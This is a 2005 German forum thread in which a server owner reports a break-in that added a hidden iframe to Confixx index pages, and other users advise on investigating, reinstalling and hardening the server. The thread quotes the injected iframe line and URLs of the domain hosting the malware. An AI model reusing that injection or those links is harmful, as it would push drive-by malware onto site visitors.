Page 1 of 4
Rootserver geknackt?
Posted: 2005-10-23 20:35
by fun4teen
Hi all,
folgendes:
Auf meinem Rootserver mit Suse 9.1 Confixx 3.x wurde auf mehreren confixx Accounts die index.html verändert ..
Und zwar folgendes hinzugefügt:
Code: Select all
<iframe src=http://buytraff.biz/dl/adv478.php width=1 height=1></iframe>
Dieser Link (oben) bitte nicht öffnen sonst habt ihr gleich ein trojaner und virus auf eurer kiste.
Code: Select all
Hier seht ihr die ganzen Viren und den Mist:
http://buytraff.biz/dl/
Nun weiß ich nicht wie das gemacht wurde.
Wie geht man am besten vor?
Ich habe nun einen Log eines der geknackten Accounts angeschaut (also der Weblog) aber nichts verdächtiges festgestellt zu dem Zeitpunkt als die Datei verändert wurde.
Welche Logs muss ich mir anschauen?
Wie geht man am besten vor?
Danke, bitte um schnellen Rat.
Re: Rootserver geknackt?
Posted: 2005-10-23 20:52
by Joe User
Tja, auch Confixx und Co muss man regelmässig updaten...
http://www.rootforum.org/faq/index.php? ... artlang=de
Zur Info: Domain wurde am 20.10.2005 in Warschau registriert...
Re: Rootserver geknackt?
Posted: 2005-10-23 21:06
by fun4teen
Kann ich in irgendwelchen dateien nachschauen, was auf dem Server gemacht wurde? Logs?
Re: Rootserver geknackt?
Posted: 2005-10-23 21:27
by wgot
Hallo,
fun4teen wrote:Kann ich in irgendwelchen dateien nachschauen, was auf dem Server gemacht wurde? Logs?
kannst Du, es gibt aber kein Logfile in dem drinsteht was an den Logfiles manipuliert wurde. :evil:
Du kannst also über die Logfiles möglicherweise den Einbruchweg nachvollziehen, aber niemals
alle erfolgten Manipulationen feststellen. Folglich freut sich Dein Server auf eine baldige Neuinstallation.
Gruß, Wolfgang
Re: Rootserver geknackt?
Posted: 2005-10-23 21:38
by fun4teen
So hab nun den Dreckshund.. zumindest ein stückchen davon:
es hat sich ein trojaner namens lrk5 eingeschlichen .. vermutlich über bufferoverflow..
http://www.sophos.de/virusinfo/analyses/trojlrk5a.html
Was jetzt?
Re: Rootserver geknackt?
Posted: 2005-10-23 21:40
by suntzu
Re: Rootserver geknackt?
Posted: 2005-10-23 21:56
by fun4teen
Ja ok.. aber dafür brauch ich Zeit (min 1. Tag)... was kann ich auf die schnelle machen?
Und vorallem .. bringt es mir nichts das system neu aufzusetzen wenn ich nicht weiß woher genau bzw. wie der Trojaner auf das system gekommen ist.
Wie kann ich das noch lokalisieren?
Danke
Re: Rootserver geknackt?
Posted: 2005-10-23 22:02
by Roger Wilco
fun4teen wrote:Ja ok.. aber dafür brauch ich Zeit (min 1. Tag)... was kann ich auf die schnelle machen?
Etwas weniger radikal (falls es dein Provider anbietet): Starte das Rescuesystem.
fun4teen wrote:Und vorallem .. bringt es mir nichts das system neu aufzusetzen wenn ich nicht weiß woher genau bzw. wie der Trojaner auf das system gekommen ist.
Es bringt aber noch viel weniger, wenn du die komprommitierte Kiste weiter am Netz lässt.
fun4teen wrote:Wie kann ich das noch lokalisieren?
Logs, IDS, Vergleich mit deinen Backups.
Re: Rootserver geknackt?
Posted: 2005-10-23 22:07
by fun4teen
Hab nun noch ein checktool drüber laufen lassen..
....
Searching for anomalies in shell history files... nothing found
Checking `asp'... not infected
Checking `bindshell'... INFECTED (PORTS: 465)
Checking `lkm'... chkproc: nothing detected
Checking `rexedcs'... not found
Checking `sniffer'... eth0: PF_PACKET(/sbin/dhcpcd)
Checking `w55808'... not infected
Checking `wted'... chkwtmp: nothing deleted
Checking `scalper'... not infected
Checking `slapper'... not infected
Checking `z2'... chklastlog: nothing deleted
Checking `chkutmp'... chkutmp: nothing deleted
....
Re: Rootserver geknackt?
Posted: 2005-10-23 22:13
by suntzu
fun4teen wrote:Hab nun noch ein checktool drüber laufen lassen..
[ snip ]
Und das hat nix gefunden... Setz die Kiste neu auf, mach die sicher. Wenn du willst, kannst du dir ja vorher über das Rescue-System ein Image ziehen oder ein rsync, dann kannst du in Ruhe analysieren.
Re: Rootserver geknackt?
Posted: 2005-10-23 22:15
by fun4teen
Gibt es ein Trick das ich nicht wider alle Confixx Accounts (+einstellungen) neu anlegen muss.. ?
Danke
Re: Rootserver geknackt?
Posted: 2005-10-23 22:17
by suntzu
fun4teen wrote:Gibt es ein Trick das ich nicht wider alle Confixx Accounts (+einstellungen) neu anlegen muss.. ?
Danke
Du spielst dein Backup wieder ein...
Re: Rootserver geknackt?
Posted: 2005-10-23 22:28
by fun4teen
woher weiß ich das diese nicht auch verseucht sind?
die daten?
Also ich stell mir das nun so vor.. ich schieb alle wichtigen daten (Emails/ confixxaccounts/pages/datenbanken etc. auf den Backupserver.. mach eine reinstallation... update erstmal alles auf den neusten Stand... zieh danach das Backup vom Bakupserver.. und spiele es wieder ein...
Oder?
Re: Rootserver geknackt?
Posted: 2005-10-23 23:19
by wgot
Hallo,
fun4teen wrote:woher weiß ich das diese nicht auch verseucht sind?
die daten?
nur geprüfte Daten zurückspielen.
Emails/ confixxaccounts/pages/datenbanken
Die Emails würde ich einfach abholen.
Bei den Confixxusern könnte einer reingemogelt sein für den der Einbrecher die Zugangdaten hat.
Bei den Datenbanken kommt's drauf an was drin ist, möglicherweise Zugangsdaten für ein Forum und der Angreifer hat sich einen Account zugelegt.
Bei den Homepages geht's hauptsächlich um die Scripts, ein zusätzliches oder manipuliertes Script ermöglicht schnellen Wiedereinstieg nachdem die Kiste neu aufgesetzt ist. Man kann natürlich auch ein Binary in einem Homepageordner verstecken, am besten mit der Dateiendung htm oder jpg. :oops:
Selbstverständlich müssen
alle Passwörter geändert werden.
Halbwegs schnell ist es nur dann erledigt, wenn man
rechtzeitig ein Backup gemacht hat und nicht erst nach dem Einbruch.
Gruß, Wolfgang
Re: Rootserver geknackt?
Posted: 2005-10-23 23:36
by chaosad
wgot wrote:
Halbwegs schnell ist es nur dann erledigt, wenn man rechtzeitig ein Backup gemacht hat und nicht erst nach dem Einbruch.
Selbst mit einem Backup kann man nicht genau sagen wie lange er sich schon auf dem System befindet. Das ganze ist nicht sooo einfach und ist immer mit einem Restrisiko verbunden
Re: Rootserver geknackt?
Posted: 2005-10-23 23:47
by fun4teen
vorallem habe ich nun (wie soeben bemerkt) ein anderes Problem.
Jemand hat auf meinem Backupserver rumgespielt.
Ich habe jede Woche ein automatisches Backup von den wichtigsten Daten gemacht... (vor 3-4 Tagen hab ich noch kontrolliert und es waren die letzten 4 da)
Nun schau ich gerade auf den Backupserver und merke das mein Backup nicht mehr da ist..
.. Aber wenn der Angreifer natürlich die automatische Backupdatei gefunden hat, hatte er auch Zugang zum Backupserver.
Was für ein Mist.
Jetzt hab ich nur noch ein Backup auf meiner Kiste hier.. welches 1/2 Monat alt ist. Naja zum Glück ist das kein Kundenserver...sondern nur einige Webseiten von mir drauf..
Ich habe nun mir mal alle daten angeschaut welche die letzen 5 Tage verändert worden sind.. also auch Bilder etc... einfach alles.. Das sah es ganz gut aus... denke nicht das der Hacker schon länger Zugang hatte..
Die ganze Angelegenheit ist echt schwierig... vorallem da ich immer noch icht weiß wie er reingekommen ist.
Re: Rootserver geknackt?
Posted: 2005-10-23 23:59
by chaosad
Wie hast du denn die Backups gemacht? Wies scheint vom root Server aus den Job zum Backup Server gestartet oder?
Am besten genau andersrum machen, somit bleibt der BackupServer unberührt.
Re: Rootserver geknackt?
Posted: 2005-10-24 15:50
by fun4teen
Ich hab halt die Lösung von Purtec genommen (die im benutzerhandbuch steht) ...
Ja die daten sind auf dem angegriffenem Server..
Frage:
Denkt ihr es ist möglich mit einem Virenprogramm den Trojaner zuz löschen?
Zumindest vorläufig?
Re: Rootserver geknackt?
Posted: 2005-10-24 15:53
by Joe User
fun4teen wrote:Denkt ihr es ist möglich mit einem Virenprogramm den Trojaner zuz löschen?
Nein.
fun4teen wrote:Zumindest vorläufig?
Nein.
Re: Rootserver geknackt?
Posted: 2005-10-24 18:49
by rudi
fun4teen wrote:Naja zum Glück ist das kein Kundenserver...
wiebitte?
Re: Rootserver geknackt?
Posted: 2005-10-25 15:26
by lord_pinhead
Er sagt es ist zum Glück kein Kundenserver ;)
Kurz vorne weg:
Kille alle Prozesse die verdächtig erscheinen
Fahre alle Dienste zum Zweck der Prüfung runter
Checke alle Files in /etc auf Veränderungen (find, grep, etc. sollten dir helfen) ebenso mal /tmp prüfen.
Suche nach allen Dateien welche die Attribute i a und s haben, meist werden die Binarys vom Hacker dadurch geschützt.
Schau dir die Passwd genau an, sollte ein User eine Loginshell haben die von Remote kommen kann, ändere das. Ist ein User hinzugekommen, such alle Files mit seiner UID
Sichere deine Daten (auch alle logs) und veranlassen eine neuinstallation, Programme wie RKHunter könnten vielleicht noch was aufdecken, aber ich würde mich nie drauf verlassen, sah ich erst letztens wieder bei nen Freund.
Bevor du die Kiste wieder Produktiov ins Netz hängst, schau mal im Forum ein paar Thread durch wie man seine Kiste sicherer macht. Stichworte wie iptables und IDS sollten dir massenhaft treffer aufzeigen. Auch "Systemtricks" wie /tmp via tmpfs mounten (+optionen noexec, nosuid) sollten gemacht werden. Und wichtiger den je ist ein eigener Kernel aufs System werfen, am besten mit GRSec und PAX (google is hier wieder dein Freund ;) ) , dann sind die Chancen etwas geringer das ein Kernelrootkit installiert werden kann, wenn der Kernel ohne Module (monolitischer Kernel) kommt ist es eigentlich unmöglich.
Ist erstmal ne Grundlage geschaffen für ein sauberes System, kannst dir auch sicher sein das du als schweres Ziel nicht so schnell Opfer von Bots und Scriptkiddies wirst.
Aso, bevor ich es vergesse. Was hat der Typ bei dir eigentlich genau gemacht? Nur eine Seite verlinken ist schon etwas eigenartig, schau mal in dein root-Postfach ob er gespammt hat.
Re: Rootserver geknackt?
Posted: 2005-10-25 16:25
by fun4teen
@Lord_Pinhead
Danke für die ausführliche erklärung/beschreibung.
Ja er hat nur alle index seiten verändert -bzw. was ich bis jetzt herausgefunden habe.
+ die Daten auf dem Backupspace gelöscht.
Das Rootpostfach ist leer ;)
Re: Rootserver geknackt?
Posted: 2005-10-25 16:31
by Joe User
fun4teen wrote:Das Rootpostfach ist leer ;)
Beherscht jedes Scriptkiddie...
Re: Rootserver geknackt?
Posted: 2005-10-25 17:14
by fun4teen
Joe User wrote:fun4teen wrote:Das Rootpostfach ist leer ;)
Beherscht jedes Scriptkiddie...
Das Postfach ist leer!
Wenn bei einer Datei dransteht wann sie zuletzt geändert wurde...lässt sich das irgendwie manipulieren?
THX
Re: Rootserver geknackt?
Posted: 2005-10-25 17:14
by aubergine
Wenn ich mich auf dem vermeintlich gehackten Server der .biz Domain, so umschaue vorallem den Ordner IP's, dann würd ich hier nicht mehr von Script Kiddies reden...